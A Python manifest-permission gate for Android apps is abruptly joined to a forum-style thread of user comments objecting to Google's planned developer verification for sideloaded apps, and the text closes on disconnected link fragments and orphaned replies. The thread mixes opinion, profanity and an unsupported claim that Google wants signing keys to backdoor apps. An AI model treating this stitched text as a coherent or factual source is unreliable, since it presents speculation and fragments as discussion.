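        return False, ["DTD or entity declaration in manifest"]
    try:
        root = ET.fromstring(manifest_xml)
    except ET.ParseError as exc:
        return False, [f"unparseable manifest: {exc}"]
    if root.tag != "manifest":
        return False, ["root element is not <manifest>"]

    reasons = []
    # Apps sharing a UID also share granted permissions, so the manifest's
    # own permission list no longer bounds what the app can do.
    if root.get(SHARED_UID_ATTR):
        reasons.append("android:sharedUserId is set")
    for tag in PERMISSION_TAGS:
        # iter() also finds misplaced nested elements, which is the
        # conservative choice for a gate.
        for element in root.iter(tag):
            name = (element.get(NAME_ATTR) or "").strip()
            if not name:
                reasons.append(f"<{tag}> without android:name")
            elif name not in ALLOWED_PERMISSIONS:
                reasons.append(f"requests {name}")
    return (not reasons), reasons


# Constructed sample manifests (decoded text form).
SAMPLE_OK = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.example.reader">
    <uses-permission android:name="android.permission.INTERNET" />
    <application android:label="Reader" />
</manifest>
"""

SAMPLE_OVERBROAD = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.example.flashlight">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission-sdk-23 android:name="android.permission.READ_SMS" />
    <application android:label="Flashlight" />
</manifest>
"""

SAMPLE_SHARED_UID = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.example.helper"
          android:sharedUserId="org.example.shared">
    <uses-permission android:name="android.permission.INTERNET" />
    <application android:label="Helper" />
</manifest>
"""

if __name__ == "__main__":
    for label, sample in (("ok", SAMPLE_OK),
                          ("overbroad", SAMPLE_OVERBROAD),
                          ("shared uid", SAMPLE_SHARED_UID)):
        accepted, why = review_manifest(sample)
        print(label, "ACCEPT" if accepted else "REJECT", why)
```

The declared permission list is only a lower bound on review: it says nothing about what the app does with network access, so a gate like this narrows the attack surface rather than vouching for the app.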
de6u99er · 25m ago
>However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option.
Don't be evil Google!
PenguinCoder · 4h ago
The new face of Embrace, Extend, Extinguish.
subarctic · 2h ago
Hmm, this is weird. I've recently been considering switching back to Android because of how locked down iOS is, and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
Dilettante_ · 3h ago
Hopefully this increases the communal pressure to find a real alternative to android.
edgarvaldes · 2h ago
Sideloading is the only reason I'm on Android. When it goes away, I will be better with an Apple device.
occz · 4h ago
That's not a good move at all.
DarkmSparks · 1h ago
Well that sucks. So basically all the money we've had taken from us for our Play Store apps is now "just" going to be spent on administering the registration details of 800 million Chinese developers and 6 billion bot accounts.
Whose smart idea was that?
zhyder · 52m ago
Apple and Google are now competing on being more closed, rather than on being more open. Perhaps because we gave Apple a free pass on curbing our freedoms, and even defended its actions as needed for 'security'.
Pfhortune · 3h ago
Disgusting, horrifying, but utterly predictable. A dark day indeed, once no major mobile platform allows running whatever code you wish. Sideloading isn't really sideloading if the app has to be signed by the gatekeeper.
Isn't this a death knell for F-Droid, at least for running on most hardware? Since they require their own builds/attestation?
The Overton Window for computing keeps inching towards gatekeepers having total control over devices. I can't help but imagine myself lurching along on the last somewhat open hardware I can cobble together in a couple of decades, because I refuse to drink the verification can to continue...
celsoazevedo · 1h ago
This would affect a lot of apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
BLKNSLVR · 1h ago
Can Google do something like this for entities wishing to advertise on their platform?
It feels as if that would provide far more of a public service than this... whatever this is.
Are there stats on whether more malware and financial scams come from installed apps or from advertising?
rep_wex · 7h ago
Google to make sideloading Android apps _harder_ by _force_ verifying developer identity for $25 and a bunch of legal documents.
jajuuka · 5h ago
If you read the article you'd see that this is a separate account type that does not have a submission fee or require legal documents. It also doesn't prevent you from side loading. It's just part of the current scare screen system when it comes to side loading.
rep_wex · 4h ago
> separate account type that does not have a submission fee or require legal documents
We do not know yet who will be considered "hobbyist". I would say they might check the user base. When hitting an app installation threshold of, let's say, 1,000 users, they will force you to pass the full legal check. Otherwise they will start blocking any further installations.
ohdeargodno · 5h ago
The only promises on the announcement are:
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number.
> * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website.
> * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
Then you're familiar with the process of getting a DUNS number. Because that is a massive barrier for individual devs and small teams. That is actual legal paperwork. Not having to do that makes the process significantly easier.
It's not a massive privacy breach. If you are so anti-Google yet use their devices then most likely you're already only distributing to GrapheneOS or LineageOS anyway. For most people who already have a Google account this is a very small bar to clear.
ohdeargodno · 4h ago
It. Doesn't. Matter.
Getting a DUNS number is ass, getting the 20 testers is ass, etc etc.
I do not want to give Google my government ID to write a shitty little app that only my family will use, or only close friends use and it gets sideloaded through sending it on chat. I do not want people making apps to skip ads on YouTube giving out their government ID. I do not want people making apps that might get them in trouble with their government to give out their government ID to Google.
jajuuka · 4h ago
So then don't. Are you seriously scared for the revanced devs? Their code is posted on Github. Their accounts are all public accounts with names and locations. Maybe don't white knight people who don't need it.
aucisson_masque · 2h ago
You failing to see the issue and dismissing it so easily is mind blowing. Revanced is nothing, he is referring to a whole ecosystem of apps made by randoms for other randoms that Google should have no business requiring government ID for and giving approval to.
Hong Kong protestors bought Android phones en masse when Apple removed apps they used to fight back on Chinese censorship; if Google is allowed to do the same you can say goodbye to freedom of information in many countries. You’re focusing on Revanced when it’s the least of the issue.
nabogh · 34m ago
Yeah if this goes ahead I'm going back to my feature phone
antman · 2h ago
This was probably the reason Nokia died. Symbian development was already cumbersome, and app deployment required some such procedure. I remember there was a joint effort in a China-based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives, and the sorry state of Symbian development and app deployment was not considered as a cause. So here it is, young executives repeating a simplistic and destructive strategy. IBM, Xerox, Nokia and Intel will be very proud.
risho · 2h ago
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
ta8645 · 1h ago
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
akomtu · 1h ago
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoid and insecure recently? What are they afraid of?
vagab0nd · 1h ago
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
tambourine_man · 1h ago
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
falcor84 · 1h ago
Will this be what finally leads to the success of a fully open-source Android fork such as CalyxOS or GrapheneOS?
AlgebraFox · 1h ago
CalyxOS is already dead. GrapheneOS is the only hope.
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”"
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
b3ing · 29m ago
They want to stop adblocking YouTube apps
EMIRELADERO · 3h ago
Holy shit, going to the official page[1], there's something that is somehow even worse than the loss of freedom:
"You'll need to prove you own your apps by providing your app package name and app signing keys."
This is confusing, since signing something already proves that you own the key.
mh- · 3h ago
My assumption is they want to eliminate/prevent schemes where a ton of apps are signed as a service by a small number of centrally controlled keys.
Someone elsewhere in the thread said this is how F-Droid works, but I can't confirm firsthand.
layer8 · 3h ago
The signing certificate should indicate who is signing, and therefore who is liable. But maybe that’s not how they set it up previously.
nullc · 2h ago
They've been demanding signing keys for apps distributed on the Play Store for years.
The only credible explanation I can come up with is that they need the keys in order to produce indistinguishably backdoored versions of applications, handy for tools like Signal.
Otherwise one would never think of requesting the private keys -- if Google wants to rebuild apps themselves they could sign with their own keys, and possessing anyone else's private key is just pure liability, as if there is any discovered abuse they can't show that they weren't the vector.
luke-stanley · 2h ago
So sketchy!
JimmaDaRustla · 59m ago
I'm waiting for this with chromium too. Microsoft Edge most removed uBlock Origin on me today.
arnaudsm · 1h ago
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out of the Play Store progressively.
I'm cancelling my Pixel 10 preorder.
bit1993 · 48m ago
Great. I suspect this will push more developers to publish web apps.
Animats · 4h ago
Does this break F-Droid?
drumhead · 4h ago
Would be a tragedy if it did. So many interesting and useful apps there without the obnoxious ads or nagging to upgrade.
Animats · 3h ago
I'm entirely on F-Droid, with no Google account and no Play Store. Losing F-Droid would force me off Android.
janice1999 · 3h ago
I'm the same. No Google account since 2012. F-Droid is an amazing community effort and has enabled me to find so many great open source applications.
o11c · 2h ago
Same.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
kykat · 4h ago
Maybe F-Droid can sign all packages themselves? Would google let them do that?
imhoguy · 1h ago
The risk is Google could ban all F-Droid apps in one step, which will happen for sure.
can16358p · 3h ago
"Can?"
Sure.
"Would?"
Google has zero incentive to do that.
kurtoid · 1h ago
How does this affect installing an APK to an offline device?
Will there be a local override?
everdrive · 2h ago
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so (compared to a general purpose computer).
Trasmatta · 2h ago
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
nvdr · 2h ago
Will this affect GrapheneOS users who have Play Protect / Services disabled? Wondering how they intend to do the verification.
antiloper · 4h ago
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
gruez · 4h ago
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
kllrnohj · 4h ago
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
subarctic · 2h ago
Exactly, the only reason to be a weirdo and have Android in the first place was because there are so many good apps available outside the Play Store. If they lock it down just like Apple then what's the point?
ranger_danger · 4h ago
> what purpose does an open source OS have against a proprietary one
lenerdenator · 4h ago
FOSS means a lot less than it used to in Android.
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
ranger_danger · 4h ago
I would argue any amount we can get is still lightyears better than not being able to replace or inspect anything at all on the system.
Rebelgecko · 3h ago
A phone running just the FOSS parts of Android is not super viable for the average person.
hagbard_c · 4h ago
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
cryptoegorophy · 53m ago
Anyone else remember “don’t be evil”?
sirjaz · 2h ago
With more and more things like this, we need to go back to making native apps on desktops and laptops where we as the users are in control.
GZGavinZhao · 2h ago
I'm curious what is going to happen to all those Chinese ROMs and third-party Chinese app stores.
imhoguy · 1h ago
China will push its own Android OS forks into other markets even harder; if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
It is funny how true this becomes with each passing day.
_benj · 4h ago
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, somebody called BS on browsers and we might have a good option soon in Ladybird!
You know how folks in the UK are cutting the surveillance cameras, what is the equivalent here?
WorldPeas · 49m ago
Making an ADB-based debloater and browser shims to use stuff like bank apps, then sharing that with others. Then again, like cutting wires, it doesn't address the root cause.
smashah · 2h ago
Not updating Android I guess
kitsune_ · 1h ago
Well I guess that's good bye Pixel and Android for me then.
2OEH8eoCRo0 · 3h ago
So that's how they kill newpipe.
xenago · 1h ago
This is the final nail in the coffin for personal computing
SJMG · 1h ago
It's a blow, but this is over dramatic.
luke-stanley · 2h ago
So Google won't even offer a system toggle to let users install an app they've made or copied?
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
mzajc · 1h ago
> Why is end-user choice and consent not considered?
The elimination of user choice was very much considered. In fact, it's the primary goal.
geekamongus · 1h ago
This doesn't seem to be going over well.
xenago · 1h ago
Only developers care. The users don't even know what sideloading is. This will successfully kill off the single remaining freedom users have.
turblety · 3h ago
Phew! I was just about to get the new Pixel too, not going to now. I wonder if Samsung will be affected.
thayne · 3h ago
> The changes will affect all certified Android devices once live
I think that is a yes, it will affect Samsung
mh- · 3h ago
Yeah, I think anything that has Google Play would fit that qualifier. So that's basically all major devices (in the West, at least). Oof.
logicchains · 3h ago
It'd be really funny if Chinese Android devices actually end up being more free because they don't have any of the Google Play stuff on them.
lucb1e · 1h ago
Note that most of them do. Huawei was banned from it but I'm not aware of other notable brands that do not ship Google software (besides that one vendor that ships Apple software)
coastalpuma · 1h ago
From the announcement
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reasons to keep using Android.
bigstrat2003 · 4h ago
I suspect this won't be disastrous for Google, because where will people who care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
Damn the future sucks ass.
asyx · 3h ago
I think the only thing that can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
3036e4 · 3h ago
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
bigC5560 · 15m ago
They recently allowed emulators, like RetroArch, to be on the app store. They still require the emulators to be written in Swift AFAIK. Still quite a bit more restrictive than Android, but they have slowly been opening up.
zb3 · 3h ago
Never, I'll stick to LineageOS till it ceases to exist.. then I'll just buy a dumbphone, f... Google!
zer0zzz · 3h ago
Juggling between Maemo and iOS back in the day, I always thought it was so wild that in later years people thought of Android as the open alternative.
matheusmoreira · 1h ago
Of course they will. It started with Play Integrity and hardware remote attestation. Soon Android will be nothing but a shittier version of iOS.
ktallett · 3h ago
Well this is me moving to E/OS full time.
myaccountonhn · 3h ago
What does this mean for projects like GrapheneOS, or F-Droid?
anonym29 · 3h ago
"The changes will affect all certified Android devices once live". AKA GrapheneOS should remain unaffected (as it is not "certified", per Google parlance), and F-Droid should remain available - in theory.
If they keep up this "boil the frog slowly" crap though, I may be migrating off of Android and over to a strictly Linux-based phone, like a PinePhone, Librem, etc.
Fuck the scumbags at the top of big tech making decisions like these.
zb3 · 3h ago
Next step: require all "certified" devices to prevent unlocking the bootloader... then possibly kill AOSP...
I have no words.. or more precisely, those words are not the kind of words I'm allowed to write here.
janice1999 · 3h ago
AOSP is being killed piece by piece - zero community engagements, infrequent dumps with no commit logs, moving everything into Google Play services and recently no more binaries for Pixel phones just to make third party ROM developers' lives a little more miserable.
smashah · 2h ago
Oh how I wish I could buy a Nokia N900 16 Pro Max and use Maemo 13
pentagrama · 2h ago
This means that for example I will not be able to side load Popcorn Time for Android [1] anymore?
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
"Developers will have freedom" yet they are subject to Google’s verification.
It’s just another stone in the grave of Android and even though I jumped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately Apple’s iOS is in competition solely with Android.
If Android gets so bad it has all the disadvantages of iOS, some more, for instance with the embedded spyware that manufacturers are paid to include, and none of the good sides of iOS, then everyone loses. Apple doesn’t have to compete anymore, they just have to not suck.
vizzier · 2h ago
Can you even compile an iOS app without registering with Apple?
black3r · 2h ago
Without an Apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free Apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
aucisson_masque · 2h ago
Is it really different from what Google is doing? Not being able to compile or the user not being able to install have the very same consequence: your app can’t be used.
was a reason I bought Android. will they be sending me a refund?
effgoogle · 2h ago
Fuck google.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Move to Linux phones, now.
macinjosh · 2h ago
Keep your phone. All you have to do is say no to digital for:
- money
- tickets
- identification
They cannot force everyone to own and buy a phone.
akk0 · 3h ago
This isn't legal in the EU is it?
sunaookami · 2h ago
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
heyheyhouhou · 3h ago
If we continue in this direction, in a couple of years, a feature phone might be an excellent choice!
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
fluoridation · 1h ago
"Distribute on" sounds odd because it's incorrect. APKs are not distributed by putting them on phones and carrying the phones from one place to another. "Distribute to" would be more correct; better yet, "develop for".
storus · 3h ago
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
can16358p · 3h ago
Google was always dystopian and evil. They just wore a good mask for some time in the beginning.
SergeAx · 1h ago
I wonder, how hard is it to build an app on the phone from source?
_blk · 2h ago
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
blinky88 · 2h ago
Absolutely disgusting. No reason to keep using Android then.
TZubiri · 1h ago
Could someone explain why the personal privacy of software developers is more important than the cybersecurity of consumers and nations please and thank you
guerrilla · 1h ago
No, fuck you. Absolutely not.
lawn · 3h ago
How will this affect GrapheneOS?
ohdeargodno · 5h ago
Additionally, this kills apps like Revanced, NewPipe, SmartTube that will now be required to give out ID to Google, surely that's something they really want to do. All Open source development is at threat, Google's absolute dogshit procedures already imposed for the play store now imposed to the entire ecosystem. All for a shitty system that breaks down to "registering package names". Cool then, guess it's time to typo squat on every variant of com.faceboook.app, because users definitely check the package name and not "oh the icon is right and so is the title".
More and more locked down devices, Android source releases only being published once a year, device drivers for reference devices disappearing, and now, verification of all your software for your "security". The war on general computing is well and truly on.
It’s sad that smartphones now hold so much personal and private data but aren’t really under the control of their users.
janice1999 · 3h ago
> Imagine MS doing the same for Windows.
They already have a version of that - it's called Windows S Mode (Windows Store apps only, no EXEs or scripts, Edge only for browsing). If they get away with it, they would make it the default. Required Microsoft accounts was a step in that direction.
dvngnt_ · 2h ago
This is what caused Gaben to create SteamOS, which is now a somewhat viable ecosystem with the Steam Deck and rumored machines.
Pfhortune · 3h ago
> Imagine MS doing the same for Windows.
It will happen. We've been the frogs boiled in the pot for years, accepting forced attestation. Eventually they'll close off running unsigned code, and the PCs will probably have bootloaders locked to Windows as well, so you can't escape.
Mindwipe · 4h ago
So, now there will be a single kill switch where a malicious government can legally compel Google to annihilate apps not of their liking.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
kirito1337 · 2h ago
Gives me another reason to use a custom ROM.
stefan_ · 3h ago
I don't understand, when the EU announced that Apple's "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Break them up already, it's getting old.
p3rls · 2h ago
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
lucb1e · 1h ago
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
aspenmayer · 3h ago
Boooo. Fuck this noise! Might as well run iOS at this point, unless your use case needs Android only apps or workflows.
What a fucking joke.
31337Logic · 4m ago
TL;DR
If you're not using Linux by now, do yourself a favor and start. You could do worse than starting with Linux Mint or PopOS, but whatever you do, get ahead of the curve and transition to these user-friendly open sourced OSes. The alternative is far, far worse at the moment.
rahidz · 4h ago
Sorry, we're getting rid of Revanced, Newpipe, Xmanager, etc. for your own good. Just like how Manifest v3 was for security. /s
pmontra · 4h ago
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
devinprater · 2h ago
Well time to make sure mobile Linux is accessible so the blind users aren't the only ones left when all the world switches to Linux /s
beeflet · 4m ago
aren't there braille terminals that work with linux? I don't know how you would make a rigorous blind UX other than working with a text interface first.
GZGavinZhao · 2h ago
Year of mobile Linux OS? /s
subarctic · 2h ago
Maybe Elon Musk can save us /s
JustExAWS · 3h ago
While I like to jump on the Google bash train as much as anyone, this is to comply with EU laws.
Apple implemented a similar change for the EU App Store earlier this year to comply with the Digital Services Act (DSA), a regulation that now requires app developers to provide their “trader status” to submit new apps or app updates for distribution.
HelloImSteven · 3h ago
But this is for apps outside the Play store, so the DSA isn’t at play here insofar as Google needs to be concerned. I don’t think there’s any solid decision on whether third-party app distribution is subject to the trader requirements, but if/when there is, it’d presumably be on the alternative distribution platform to enforce, not Google. Plus, Google already adjusted its policies to comply with the DSA.
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
I.e. it doesn't require this at all, it merely requires Google require verification for apps that they themselves distribute. What they've been doing all along until now plus or minus minor bookkeeping details on what data they collect.
morsch · 3h ago
So they (or rather TC) claim. Does the DSA actually require it, though?
201984 · 3h ago
Just wonderful. Why does Europe insist on imposing regulations like this that companies then force on the rest of the world? It's one thing if they're benign but this very much isn't.
o11c · 2h ago
Only monetized apps (whether that be directly paid, microtransactions, ads, etc.) are legally required to go through that process - and it's a perfectly sensible requirement for the government to say "if you want to run a business, you need to do so as a business".
That is most apps - but not the kind of apps Google is attacking here (personal-scale, actually-free, third-party, etc.). And "apps that are not monetized" is actually a very nice thing to filter for from a user perspective.
Of course, the world's largest malware vendors love to use government action as an excuse to do something else malicious.
thayne · 3h ago
IANAL, but I don't see how that applies to apps that Google doesn't distribute.
mvdtnz · 3h ago
There is no law in EU which requires Thailand-based developers to provide their trader status in order to serve Thai customers. Stop making shit up.
croes · 3h ago
They usually fight harder against such laws if they don’t suit them.
NoahZuniga · 5h ago
Seems reasonable
guywithahat · 3h ago
I don't like it, however I do feel sympathy for Google. There are probably a lot of idiots who download spyware.apk, it breaks other legitimate apps, steals their information, and then they go online and complain about how Android isn't secure or otherwise doesn't work.
Users should be allowed to brick their device if they're sufficiently stupid, but I feel bad for Google who has to deal with some of those people blaming them.
sunaookami · 2h ago
You don't need to feel bad for them, the Play Store is full of malware so what makes you think this change will help? This is a self-inflicted problem.
kbolino · 3h ago
I would be surprised if Android has a reputational issue among users. Maybe at the margins, but not enough to significantly affect market share. Most people have already sorted into iOS and Android camps already.
To whatever extent Google may be responding to an issue arising from the market, it is likely at the behest of large companies, especially payment processors, payment card networks, banks, etc. These institutions lately have begun to exert increasing influence over end-user activities, and it would not surprise me if they are playing a part here, too.
ktallett · 3h ago
Why is there no sensible behaviour and knowledge around APK installation like there is about any piece of software on a personal computer?
Zak · 3h ago
It is also common for people to install things on Windows without thinking critically. It is perhaps less common on Mac OS, but I've seen someone get malware that way.
My position is that this is not the OS vendor's responsibility to prevent. A warning is fine. A scan for known malware by default is fine. Beyond that, it's my device and it's my choice to get software from wherever I damn well please even if it might be a bad idea.
codemac · 3h ago
I have little to no evidence that there is sensible behavior and knowledge around software on personal computers.
The biggest difference these days is most folks don't even use a personal computer.
ktallett · 3h ago
But there is far more education and knowledge that it is a bad thing.
gjsman-1000 · 3h ago
Because only 5% of American adults are highly literate with technology, 30% of working adults self-identify as "never (ever!)" using folders and files for organization, and most people have better things to do with their time to be taught to perfectly analyze the safety of an App Store. Don't hope in the next generation either - only 38% of Gen Z could successfully complete tasks more difficult than moving an email between folders, while an IEA study found that only 2% of Gen Z had reached the anticipated "digital native" stereotype level of fluency.
cookiengineer · 3h ago
Can you please post the source of the study?
A4ET8a8uTh0_v2 · 1h ago
Thank you. The number sounds impossibly high. Like I did meet people like it, but not nearly as often.
babypuncher · 3h ago
I would argue that Gen Z is worse at computers than Millennials specifically because we put too many guardrails in place to make computing easy for the illiterate. Now we are all paying the price, as user agency is continually eroded away to further protect the dumb from their own unwillingness to gain a basic understanding of the very tools critical to their daily life.
ktallett · 3h ago
Firstly what is the source and secondly, the US is not the majority user of mobile phones and especially not android.
Yeul · 1h ago
I don't really understand. These people would never download F-droid in the first place or go into settings to enable dev mode.
And besides if you really want to combat fraud stop using credit cards for fuck sake and make a modern payment system that doesn't rely on 1970s technology.
Aaargh20318 · 3h ago
What makes you think that people are sensible about installing shit on their personal computers?
guywithahat · 2h ago
They're not, and Windows got decades of hate for it. Google probably wants no part in that, especially since Apple mostly avoids viruses and malware through their app store
zb3 · 3h ago
This is just an excuse. Google doesn't care about these people, they already proved that by showing scammy advertisements, as long as they get their profits, they don't care. Don't fall for this "it's for your security" argument.
seviu · 3h ago
It’s an excuse they use. They don’t care if your average grandmother gets infected by a virus.
This trust me bro, our App Store is safer is just getting on my nerves. Every day we get malware popping on both app stores.
[1] https://classic.austlii.edu.au/au/legis/nsw/consol_act/ca190...
[2] https://grapheneos.org/features#duress
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
Windows was never going to go another way than this.
Users who care about hardware and/or software freedom should be on linux.
What a lovely granny that totally exists.
This doesn't make much sense to me.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
